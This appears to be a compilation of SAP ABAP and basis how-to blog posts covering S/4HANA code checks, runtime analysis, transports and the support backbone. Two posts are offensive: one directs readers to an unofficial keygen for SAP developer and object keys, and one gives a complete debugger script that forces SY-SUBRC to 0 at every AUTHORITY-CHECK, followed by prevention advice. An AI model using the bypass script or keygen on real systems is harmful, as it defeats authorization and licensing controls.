Setting up S4HANA custom code adjustments

You have just upgraded to S4HANA in your sandbox or development system. SPAU and SPAU_ENH processing are done. Next step is the S4HANA custom code adjustments.

Questions that will be answered in this blog are:

  • How to import the SCI variants for S4HANA custom code adjustments?
  • How to import the latest simplification database into your system?
  • How to

Importing the SCI variants

Goto transaction SCI and select the option Utilities and then Import Check Variants. This action will import the required variants. Check that the variants are present now.

In the SCI variant, you can leave everything as delivered out-of-the-box with the exception of the material length option. If you keep the material field business wise to 18 (which most customers do), you need to change the variable from 40 to 18.

Setting up the simplification database

Follow the instructions of OSS note 2241080 – SAP S/4HANA: Content for checking customer specific code, to download the latest content for the simplification database.

Use transaction SYCM to upload the file. Select option Simplification Database and then Import from ZIP File.

Running the ATC tool

Now you can start to setup the ATC tool. For details see this blog.

The ATC variant to run should like like this:

Important here:

  • Select the desired S4HANA readiness check SCI variant
  • Set the package to Z* to select your custom code
  • Tick the box for Calculate quick fix proposals

Now you can start the ATC run:

Set the results to Active to see all the results in Eclipse as well. Pending on your system size lower the default number of processes from 10 to for example 5.

If you run into ATC tool issues for the S4HANA custom code adjustments run: first increase memory parameter rsdb/obj/buffersize in RZ11 to at least 150 MB. Then run again.

Processing the results

The ATC tool will now give a lot of results:

The results from the ATC tool can be distributed to more members by changing the Contact Person. To do this select one or more findings and right click on the Contact Person column, and select the option Change Contact Person.

The basic order of processing the results:

  1. Check simplification OSS note
  2. Fix code
  3. Apply relevant pragma (directly or in Eclipse via quick fix)
  4. Apply exemption

For the exemptions: you can raise them, but different person needs to approve them.

When you are using Eclipse, you might run into issue with exemption request. See OSS note 2815887 - ATC: No Possibility to Request Exemptions in Eclipse for the fix.

Statistics from the ATC runs

If you run the ATC tool weekly, you can use it to track the progress. In the ATC results screen there is a specific button Statistics View:

Default sorting is by type of issue to be solved:

This view can also be sorted on Contact Person. This will enable you to check the progress of each developer with his or her work list.

Using quick fixes with Eclipse

Using quick fixes with Eclipse is a fast way of going through the list. The Eclipse list is based on Contact Person and active results. So you only see in Eclipse the results for your user account.

In Eclipse first select the appropriate views:

Now you can start processing. You will get online help and you can apply the quick fix proposed automatically in stead of keying it in by hand.

You might run into an initial bug with a dump, which is solved by applying OSS note 2647710 - Simple transformation: Inconsistent ST loads.

Further background information

More information can be found:

SAT ABAP runtime analysis

The SAT ABAP runtime analysis tool can be used to identify performance problems in ABAP programs.

Questions that will be answered in this blog are:

  • How to run the SAT tool?
  • How to read the results of the SAT tool?

Starting the SAT tool

The SAT ABAP runtime analysis tool can be started with transaction SAT:

Top left there is a Tips & Tricks button. This will bring you the to the following tool:

Here you can compare the optimal and not optimal way of coding. By hitting measure runtime button you can actually compare in real time the difference between the 2 methods.

The performance issue program

To test the tool, we first write a simple test program:

REPORT zperftest2.

DATA: zlt_vbak TYPE TABLE OF vbak.
DATA: zls_vbak TYPE vbak.
DATA: zlt_vbap TYPE TABLE OF vbap.
DATA: zls_vbap TYPE vbap.
DATA: zls_vbap2 TYPE vbap.

SELECT * FROM vbak INTO TABLE zlt_vbak UP TO 100 ROWS.

LOOP AT zlt_vbak INTO zls_vbak.
  SELECT * FROM vbap INTO zls_vbap.
    DO 10000 TIMES.
      zls_vbap2 = zls_vbap.
    ENDDO.
  ENDSELECT.
ENDLOOP.

Now we start the SAT tool, enter the program name. Make sure the tick box evaluate immediately is on and press Execute.

Now the measurement will start.

Result of the trace tool

The result of the trace tool is as follows:

On the left side you see the split in where the program spends it time. Here you can see that most of the time is spend on internal processing and not on SQL statements. SQL statement can be analyzed from the SAT tool or from the ST05 SQL trace tool.

By double clicking on the the internal access the right hand side of the screen is filled. Here you can see in which code blocks the most net and gross time is spent. It does not always point you to the exact statements that are not ok, but it can point you to the program that is causing the biggest delay.

In our case the DO 10000 TIMES loop is the performance killer. With only SQL tracing this cannot be found.

Delete ABAP developer keys

This blog will answer the following questions:

  • How to delete old ABAP developer keys from my system?

ABAP developer keys clean up

If ABAP developers leave their key is still in your system and could potentially misused. Also when SAP comes to measure licenses they might peek in table DEVACCESS to see which developer keys are present.

Unfortunately SAP does not deliver a standard program delete an unused ABAP key. See OSS note 1710320 – How to delete SSCR Object and/or Developer Keys – SAP ONE Support Launchpad.

So you simply have to write your own customer program with a code that looks like:

DELETE FROM DEVACCESS WHERE UNAME EQ '<USERNAME>'.

Maintenance view on DEVACCESS

Alternative solution is to create a maintenance view on table DEVACCESS. This will require a once off modification key. Then you can delete and insert developers keys via the normal SM30 table maintenance transaction.

Developer key hack

The developer keys are not safe, so don’t rely on them. See this blog.

Analyzing code before upgrade or support package: CDMC toolset

This blog will explain on the tools you can run analyzing your code before starting upgrade or support package.

CDMC toolset

Start transaction CNV_CDMC to goto the CDMC overview.

 

Goto ad hoc analysis:

CNV_CDMC start screen

Start SAP modification run

Determine SAP modifications run

Wait for run to finish. If done, click the Display Results.

Run ready

View results:

Run results

Setback of the modification overview: also OSS notes are marked as modifications.

Other useful runs: Syntax check and Inactive customer objects.

If you run these checks before an upgrade you can save quite some annoying issues during the upgrade itself.

Generating substitution and validation rules

In the FICO module the consultant can define substitution and validation rules. These rules must be generated before they are active.

Questions that will be answered in this blog are:

  • How can I generate substitution and validation rules?
  • Where can I find more background on substitution and validation rules?

Substitution and validation rules generation

Goto SE38 and start program RGUGBR00:


Substitutions and validations

Simple select the correct application are indicated by the FICO consultant (this area can be FI, CO, etc). Select Generate validations and Generate Substitutions. Now execute.

Transport and system copies

You will need to run program RGUGBR00 locally on the system after the transport import is done.

Also after a system copy program RGUGBR00 must be run again.

Background on substitutions and validations

The full functional background on substitution and validation can be found this SAP wiki.

SAP support backbone update

SAP has announced an update on its support backbone to go live per 1.1.2020. If you did not prepare your systems for it, you might loose support functions.

Even recently you might see this big warning on SAP support site:

Questions that will be answered in this blog are:

  • Where can I find more background information on the SAP support backbone update?
  • Do I need to upgrade SAP solution manager?
  • How to switch to digitally signed OSS notes?
  • Do I need to change my OSS RFC’s?
  • What else do I need to do?
  • How to check the correct setup in the SAP EWA report?

Background information on SAP support backbone update

The landing page for SAP support backbone update can be found by following this link.

The webinar recording explaining all the highlights can be found by following this link.

The official OSS note is 2737826 – SAP Support Backbone Update / upcoming changes in SAP Service and Support Backbone interfaces (latest) in January 2020.

What will change per 1.1.2020?

Basically the connection from SAP solution manager and the on premise SAP systems connection to the SAP backbone will change. This will impact many areas like OSS notes, EWA’s, landscape planning etc.

What do you need to do if you don’t want to loose any functionality?

Solution manager

If you don’t want to loose any functionality in SAP solution manager you will need to upgrade to Solution manager 7.2 to support package 7 or 8. If you are on 8 you have to do less manual work than on 7. On solution manager support packs 5 and 6 some functions will work, but with manual work and limitations. On solution manager 7.1 and solution manager 7.2 up to support pack 3, the connection to SAP support backbone will be lost on 1.1.2020. You can already upgrade to SP8 now and prepare solution manager.

For the automatic configuration of the connectivity follow the instructions in OSS note 2738426 – Automated Configuration of new Support Backbone Communication.

OSS notes

For OSS notes there are 2 changes: the RFC to SAP and digitally signed OSS notes.

For the RFC connection read and follow the instructions from OSS note 2740667 – RFC connection SAPOSS to SAP Service & Support backbone will change (latest) in January 2020.

OSS notes via SNOTE must be switched to digitally signed OSS notes. How to do this: see blog.

Next to this, you will need to change the OSS note RFC destination. The generic user will no longer work. You will need to change it to named technical user, or change to the connection from RFC to https connectivity.

If you setup digitally signed OSS notes there is an option for fallback to insecure.

Attention: this fallback will no longer work after 1.1.2020.

ANST

ANST is a great function to help you find OSS notes relevant for your issue. For more explanation on ANST look at this blog. The ANST reaches out to the SAP support backbone to check for recent notes. To keep the function working you need to setup a new webservice in SOAMANAGER (if the SOAP runtime is not active follow instructions in this blog). To setup the specific webservice follow the instructions in oss note 2730525 – Consuming the Note Search Webservice. Then apply OSS note 2732094 – ANST- Implementing SOAP Based ANST Note Search.

While switching to new SAP support backbone you might get a connection error. Follow the instructions from OSS note 2781045 – ANST / ST22 note search “Connection cannot be established” to solve it.

Support backbone configuration check in EWA report

If you install ST-A/PI 01T sp02 or higher in your system (see OSS note 2827332 – Service Data not Complete due to ST-A/PI not Up-to-date), the EWA report of that system will give information about the correct connection to SAP support backbone and correct use of technical user for the communication.

Example:

In the process OSS note 2802999 - SDCCN activation fails without errors or red icons in Migrate tab might need to be applied as well to solve an SDCCN error.

Requirements and formulas

This blog will explain on post processing for requirements and formulas.

Questions that will be answered are:

  • How do requirements and formulas work?
  • How does generation via program RV80GHEN work?
  • How to automate RV80GHEN in transport?

VOFM: formulas

Formulas are maintained in transaction VOFM.

The start screen is just a menu:

VOFM start screen

The background of VOFM for all its options is explained in OSS note 327220 – VOFM function and its objects.

In this example we will code a new requirement for pricing (one of the most used topics for VOFM). Select the menu entry Requirements and then pricing:

Custom requirement for pricing

If you build you own routines the have to use the 900 series. Unfortunately the call off requires an SCCR object key. Save your 900 series entry.

Now double click on the routine to go into the editor:

Custom code for custom requirements

Now you can insert the custom code for your routine. Since system regards it as modification you will have to use the modification editor.

Program generation

After you finish the routine, you have generate it. Run program RV80GHEN to regenerate the routines. If you don’t do the generation run, your routine (or updated routine) will not be called.

Generation after transport

After you transport the routine to a quality or productive system the newly generated routine is not generated. So you need to run RV80GHEN in the target system. You can automate this by putting in an XPRA action for program RV80GHEN in the transport. Then as final step after import the RV80GHEN run will be triggered automatically.

OSS note 598475 – XPRA RV80HGEN when transporting VOFM objects contains a modification to automate this for newly created routines. But this does not work for changes of routines.



ABAP developer keys and object keys hack

A lot of basis and ABAP people feel protected by the ABAP keys and object keys for standard SAP changes. They have to be called off at SAP marketplace keys section.

Let me already give away the clue: since quite some time there is a KeyGen for ABAP and object keys. The protection is gone.

This blog will answer following questions:

  • Where can I download the ABAP keygen?
  • How to run the ABAP keygen?
  • How should I protect my system from unwanted ABAP changes?
  • S4HANA does not use developer keys and object keys any more, how should I protect my S4HANA system from unwanted ABAP changes?

Where can I download the ABAP keygen?

Google for SAP IWR Object key generator. Or click here for a copy:

Upon download: rename the file to .zip and unzip it.

Running ABAP keygen

Running the executable is simple. But you need to run it in Windows 7 compatibility mode.

Keygen screen

Fill out the data and hit generate…. that’s all.

The use of this tool is at your own risk. Most admins don't like you to use this tool at all.

The whole idea of this blog is to show not to rely on the developer key procedure.

How should I protect developments?

The best way to protect your development is to carefully grant the S_DEVELOP privilege. Only give it to the right people and only give it to develop Z* range of code.

S4HANA developer key

The title is a bit misleading. In S4HANA there are no developer keys and object keys any more.

Background of this change be SAP can be found in OSS note: 2309060 – The SSCR license key procedure is not supported in SAP S/4 HANA.

So in S4HANA, you must set up authorizations for S_DEVELOP properly.

With S_DEVELOP you have to set create/change rights for the packages and or objects. For custom code only hand out Z* privileges.

If you hand out a * for the objects or classes, then the developer can also change standard SAP.


Custom ABAP set original system system

After a copy of a system to a new system (like a sandbox) you will find out the custom objects have a different original system and all changes will result into modification editor in stead of the normal ABAP editor.

Questions that will be answered in this blog are:

  • How to change original system of an object?
  • How to mass change original system of all Z objects in one shot?

Changing original system of an object

To change on original system of an object first start transaction SE03 to go to the transport organizer tools:

SE03 start screen

Select the tool Change Object Directory Entries:

Change object directories selection screen

Here you can select a specific program, function group, etc. In our case, we do a selection on the original system. This will give list of all objects with that original system:

Change object directories objects list

If you select an object and press the Change Object Directory button, you can change the original system of a single object.

Mass change

To execute a mass change you need select the top node first and then give in a command (not a menu option): key in mass in the command part:

Entry mass

Then hit enter and a new hidden popup will come:

Change to new original system

Now enter the new original system and press Ok. All is change in one shot now.

Emergency program

If for some reason it does not work you can use the below emergency program:

DATAzlt_tadir TYPE TABLE OF tadir.

DATAzls_tadir TYPE tadir.

SELECT FROM tadir INTO TABLE zlt_tadir WHERE srcsystem EQ 'SRC'.
LOOP AT zlt_tadir INTO zls_tadir.
zls_tadir-srcsystem 'TAR'.
MODIFY  tadir FROM zls_tadir.
WRITE sy-subrc.
ENDLOOP.

Debug scripting to bypass AUTHORITY-CHECK statements

How annoying these authorizations are… isn’t there a way to mass bypass them?

This blog will explain how you can do this with the use of debug scripting.

Recipe for bypassing authority-check via debug script

As input we need to have development rights with debug and replace (without replace it will not work).

Now we start a program like RSUSR003 in SE38 and find out we are not authorized:

RSUSR003

Now we start the debugger with /h and goto the scripting tab:

Script page

In the coding block of the script load this block of coding:

 *<SCRIPT:PERSISTENT>


*<SCRIPT:HEADER>
*<SCRIPTNAME>ZBYPASS</SCRIPTNAME>
*<SCRIPT_CLASS>LCL_DEBUGGER_SCRIPT</SCRIPT_CLASS>
*<SCRIPT_COMMENT>Debugger Skript: Default Template</SCRIPT_COMMENT>
*<BP_REACHED>X</BP_REACHED>

*</SCRIPT:HEADER>

*<SCRIPT:PRESETTINGS>
*<BP>
*<FLAGACTIVE>X</FLAGACTIVE>
*<KIND>1 </KIND>
*<STATEMENTSTA>AUTHORITY-CHECK</STATEMENTSTA>
*</BP>

*</SCRIPT:PRESETTINGS>

*<SCRIPT:SCRIPT_CLASS>
*---------------------------------------------------------------------*
*       CLASS lcl_debugger_script DEFINITION
*---------------------------------------------------------------------*
*
*---------------------------------------------------------------------*
CLASS lcl_debugger_script DEFINITION INHERITING FROM  cl_tpda_script_class_super  .

  PUBLIC SECTION.
    METHODS: prologue  REDEFINITION,
      init    REDEFINITION,
      script  REDEFINITION,
      end     REDEFINITION.

ENDCLASS.                    "lcl_debugger_script DEFINITION
*---------------------------------------------------------------------*
*       CLASS lcl_debugger_script IMPLEMENTATION
*---------------------------------------------------------------------*
*
*---------------------------------------------------------------------*
CLASS lcl_debugger_script IMPLEMENTATION.
  METHOD prologue.
*** generate abap_source (source handler for ABAP)
    super->prologue( ).
  ENDMETHOD.                    "prolog

  METHOD init.
*** insert your initialization code here
  ENDMETHOD.                    "init
  METHOD script.

****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
*Importing
*        REFERENCE( P_NEW_VALUE ) TYPE STRING
*        REFERENCE( P_OFFSET ) TYPE I
*        REFERENCE( P_LENGTH ) TYPE I
*        REFERENCE( P_VARNAME ) TYPE STRING
****************************************************************

*************************************************
* debugger commands (p_command):
* Step into(F5)   -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_INTO
* Execute(F6)     -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OVER
* Return(F7)      -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OUT
* Continue(F8)    -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_CONTINUE
*************************************************
****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DEBUGGER_CTRL / METHOD = DEBUG_STEP )
*Importing
*        REFERENCE( P_COMMAND ) TYPE I
****************************************************************

****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_ABAPDESCR / METHOD = LINE )
*Returning
*        VALUE( P_LINE ) TYPE I
****************************************************************

    TRY.
        CALL METHOD abap_source->line
          RECEIVING
            p_line = DATA(p_line).
      CATCH cx_tpda_src_info .
      CATCH cx_tpda_src_descr_invalidated .
    ENDTRY.

    TRY.
        CALL METHOD debugger_controller->debug_step
          EXPORTING
            p_command = cl_tpda_script_debugger_ctrl=>debug_step_over.
      CATCH cx_tpda_scr_rtctrl_status .
      CATCH cx_tpda_scr_rtctrl .
    ENDTRY.


****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
*Importing
*        REFERENCE( P_NEW_VALUE ) TYPE STRING
*        REFERENCE( P_OFFSET ) TYPE I
*        REFERENCE( P_LENGTH ) TYPE I
*        REFERENCE( P_VARNAME ) TYPE STRING
****************************************************************

    TRY.
        CALL METHOD cl_tpda_script_data_descr=>change_value
          EXPORTING
            p_new_value = '0'
*           p_offset    = -1
*           p_length    = -1
            p_varname   = 'sy-subrc'.
      CATCH cx_tpda_varname .
      CATCH cx_tpda_scr_auth .
    ENDTRY.

  ENDMETHOD.                    "script
  METHOD end.
*** insert your code which shall be executed at the end of the scripting (before trace is saved)
*** here

  ENDMETHOD.                    "end
ENDCLASS.                    "lcl_debugger_script IMPLEMENTATION
*</SCRIPT:SCRIPT_CLASS>

*</SCRIPT:PERSISTENT>

Check the code by hitting the check button.

If the code is ok, set the break-point at ABAP command AUTHORITY-CHECK:

Breakpoint

Now click on the Start Script button.

End result: you can execute the program without any issues.

Explanation of the method

What has happened here? The debug scripting is nothing more then fast automation. The developer could have manually bypassed all the multiple authorization checks in this program. Now he lets the script take care: the coding of the script simple changes the SY-SUBRC value after any break-point (which is reached at statement AUTHORITY-CHECK) to 0, which is green light: pass.

Prevention

If you don’t want this to happen in your system there are 2 main measures to take:

  1. Remove debug & replace authorization from all non-ABAP developers in a development system and remove debug & replace from all non-development systems for all users
  2. Make sure you tell the ABAP developers that you are aware of this script. You cannot prevent them from running it, but you can tell them that if you find out it can have severe consequences.